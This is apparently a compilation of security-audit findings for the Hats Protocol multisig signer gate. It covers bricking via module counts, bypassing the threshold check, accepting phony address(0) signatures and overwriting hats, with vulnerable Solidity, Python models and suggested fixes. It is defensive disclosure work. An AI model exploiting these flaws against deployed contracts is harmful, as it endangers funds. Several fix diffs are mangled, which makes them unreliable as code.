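    def check_after_execution(self):
        if self.entries == 0:
            raise RuntimeError("underflow: reentry detected")
        self.entries -= 1

# Current design: outer + reentrant call each increment, both decrements succeed.
g = Guard()
g.check_transaction_increment()   # outer tx
g.check_transaction_increment()   # reentrant tx
g.check_after_execution()         # inner post-check
g.check_after_execution()         # outer post-check -- no revert, reentry undetected
```

With `check_transaction_set` instead, the second entry resets the counter to 1, the inner post-check drains it to 0, and the outer post-check hits the underflow, which is the behavior the comments describe.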
If another module adds a module, the safe will be bricked
high
If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the "before" check uses `enabledModuleCount` and the "after" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the "before" check would clip off the final modules, and the "after" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. 
This will lead to the "before" and "after" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible way to fix this problem is to have the other module remove the additional module it added. But, depending on the specific circumstances, this may not be possible. For example, the module that performed the adding may not have the ability to remove modules.
The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.
The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
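A minimal Python model of the paginated before/after snapshot (hypothetical helper names) shows why a module added outside `enableNewModule()` makes the two views diverge permanently:

```python
def paginate(modules, page_size):
    """Toy stand-in for getModulesPaginated: return at most page_size entries."""
    return modules[:page_size]

enabled_module_count = 1              # HSG only knows about itself
modules = ["HSG", "OtherModule"]      # second module added by a module, bypassing enableNewModule

before = paginate(modules, enabled_module_count)       # extra module clipped off
after = paginate(modules, enabled_module_count + 1)    # extra module now visible
# hash(before) != hash(after), so every tx reverts with SignersCannotChangeModules
assert before != after
```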
Signers can brick safe by adding unlimited additional signers while avoiding checks
high
There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. 
Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert once the new owners are active as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.
There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.
Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n
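The clamping in `_getCorrectThreshold()` can be modeled in Python (hypothetical sketch) to show why the post-flight check cannot detect extra owners once the count exceeds `targetThreshold`:

```python
def correct_threshold(valid_count, min_threshold, target_threshold):
    """Mirror of _getCorrectThreshold: clamp valid signer count into [min, target]."""
    if valid_count < min_threshold:
        return min_threshold
    if valid_count > target_threshold:
        return target_threshold
    return valid_count

# Safe already at targetThreshold: adding more valid signers does not move the
# expected threshold, so the checkAfterExecution comparison still passes,
# even though the new count may now exceed maxSigners.
assert correct_threshold(10, 2, 8) == correct_threshold(12, 2, 8) == 8
```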
HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount
high
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that neither function allows more valid signers than `maxSigners` to exist.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words, the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSigners=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. 
The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n
As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.
```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n
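The stale-counter scenario can be sketched in Python (toy model, not the contract state) to show how `claimSigner` passes while the true valid-signer count already equals `maxSigners`:

```python
max_signers = 10
stored_signer_count = 9      # stale: HSG last reconciled while one hat was not worn
actual_valid_signers = 10    # the hat was re-worn, but reconcileSignerCount never ran

# claimSigner only consults the stale counter, so its guard passes:
assert stored_signer_count < max_signers
actual_valid_signers += 1    # new claimant swaps in as the 11th valid signer

# the next reconcileSignerCount now reverts: validSignerCount > maxSigners
assert actual_valid_signers > max_signers
```

Calling the reconcile step at the top of `claimSigner` (the recommended fix) would refresh `stored_signer_count` to 10 first, making the guard reject the 11th claimant.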
Signers can bypass checks and change threshold within a transaction
high
The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. 
targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.
Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.
Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n
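A small Python model (hypothetical) of the post-flight check shows that it only validates consistency of the final state, so a transaction that removes an owner and lowers the threshold together still passes:

```python
def post_flight_ok(safe_threshold, valid_signers, min_t, target_t):
    """Model of the post-flight check: threshold must equal clamp(valid_signers)."""
    expected = min(max(valid_signers, min_t), target_t)
    return safe_threshold == expected

# Before: 8 owners/signers, threshold 8 -- consistent.
assert post_flight_ok(8, 8, 2, 10)
# The tx calls removeOwner(): 7 signers, threshold 7 -- also "consistent",
# so the signers changed the threshold without tripping the check.
assert post_flight_ok(7, 7, 2, 10)
```

Snapshotting the threshold in `checkTransaction()` and comparing against that stored value, as recommended, would catch the mid-transaction change.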
Hats can be overwritten
medium
Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.
Check that the admin hat exists before minting, by comparing any of its properties against default values:\\n```\\nrequire(_hats[admin].maxSupply > 0, "Admin not created")\\n```\\n
null
```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n
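The overwrite can be modeled with a toy Python mapping (hypothetical ids, not the Hats storage layout) showing that re-deriving a child id under a later-created admin silently replaces the existing hat:

```python
hats = {}

def create_hat(hat_id, max_supply):
    """Toy _createHat: writes unconditionally, so an existing id is overwritten."""
    hats[hat_id] = {"maxSupply": max_supply}

create_hat("1.1.1", 5)   # child created while admin "1.1" does not yet exist
create_hat("1.1", 1)     # admin created afterwards; its next child id is 1.1.1 again
create_hat("1.1.1", 99)  # "immutable" child silently overwritten
assert hats["1.1.1"]["maxSupply"] == 99
```

Guarding `create_hat` with a check that the admin entry already exists (mirroring the recommended `require`) prevents the child from being created under a nonexistent admin in the first place.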
targetThreshold can be set below minThreshold, violating important invariant
medium
There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.
Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n
Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.
```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n
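The proposed fix can be sketched in Python (hypothetical setter mirroring the recommendation) to show the lower-bound check that `_setTargetThreshold` is missing:

```python
def set_target_threshold(target, min_threshold, max_signers):
    """Setter with the missing lower-bound check added (proposed fix)."""
    if target < min_threshold or target > max_signers:
        raise ValueError("InvalidTargetThreshold")
    return target

# With min=5, setting target to 3 now reverts instead of bricking the safe
try:
    set_target_threshold(3, min_threshold=5, max_signers=10)
    raise AssertionError("should have reverted")
except ValueError:
    pass
```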
Swap Signer fails if final owner is invalid due to off by one error in loop
medium
New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for 
the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.
Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n
When only the final owner is invalid, new users will not be able to claim their role as signer, even though they should.
```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n
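The off-by-one can be reproduced with a minimal Python loop (hypothetical helper) mirroring `for (uint256 i; i < _ownerCount - 1;)`:

```python
def find_invalid_owner(owners, is_valid):
    """Buggy mirror of _swapSigner's loop: stops one short of the last owner."""
    for i in range(len(owners) - 1):   # misses owners[-1]
        if not is_valid(owners[i]):
            return i
    return None

owners = ["a", "b", "c"]
is_valid = lambda o: o != "c"          # only the final owner is invalid
assert find_invalid_owner(owners, is_valid) is None   # bug: invalid owner missed
assert any(not is_valid(o) for o in owners)           # yet one owner really is invalid
```

Iterating over `range(len(owners))` instead, as recommended, returns index 2 and allows the swap.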
If a hat is owned by address(0), phony signatures will be accepted by the safe
medium
If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... 
which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.
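The chain of checks above can be modeled with a short Python sketch. This is a simplified, hypothetical model — the function names mirror the Solidity code, but none of this is the actual implementation:

```python
# Simplified model of the validation chain: ecrecover returning address(0)
# for a malformed signature, and a balance check with no zero-address guard.
ZERO_ADDRESS = "0x0"
_balance_of = {}  # storage: (wearer, hat_id) -> balance

def mint(wearer, hat_id):
    _balance_of[(wearer, hat_id)] = _balance_of.get((wearer, hat_id), 0) + 1

def balance_of(wearer, hat_id, active=True, eligible=True):
    # mirrors Hats.balanceOf: gated on active/eligible, no address(0) check
    return _balance_of.get((wearer, hat_id), 0) if active and eligible else 0

def is_valid_signer(account, signers_hat_id):
    return balance_of(account, signers_hat_id) > 0

def ecrecover(signature_valid, signer):
    # a v value other than 27/28 makes the real ecrecover return address(0)
    return signer if signature_valid else ZERO_ADDRESS

mint(ZERO_ADDRESS, 42)  # an admin mints the signer hat to address(0)

# any phony signature now recovers to address(0) and passes the signer check
recovered = ecrecover(signature_valid=False, signer="0xattacker")
print(is_valid_signer(recovered, 42))  # True
```

The suggested `currentOwner != address(0)` check would break this chain at the recovery step.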
The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.
If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.
```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n
If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked
medium
`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. 
This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.
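The pre-/post-flight hash mismatch can be reproduced with a small Python model (illustrative only; list slicing and hashing stand in for the safe's actual pagination and module hashing):

```python
import hashlib

def get_modules_paginated(modules, page_size):
    # models GnosisSafe.getModulesPaginated: returns at most page_size modules
    return modules[:page_size]

def modules_hash(modules):
    return hashlib.sha256(",".join(modules).encode()).hexdigest()

# a safe that already has 7 modules when HatsSignerGate is attached
existing = [f"module{i}" for i in range(7)]
enabled_module_count = len(get_modules_paginated(existing, 5)) + 1  # 5 + 1 = 6

safe_modules = ["HatsSignerGate"] + existing  # 8 modules after attachment

# checkTransaction hashes the first enabledModuleCount modules;
# checkAfterExecution compares against the first enabledModuleCount + 1
pre = modules_hash(get_modules_paginated(safe_modules, enabled_module_count))
post = modules_hash(get_modules_paginated(safe_modules, enabled_module_count + 1))
print(pre != post)  # True -> SignersCannotChangeModules on every transaction
```

With 5 or fewer pre-existing modules both slices return the same full list, so the hashes match and transactions pass.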
The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != modulesWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n
If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.
```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n
[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`
medium
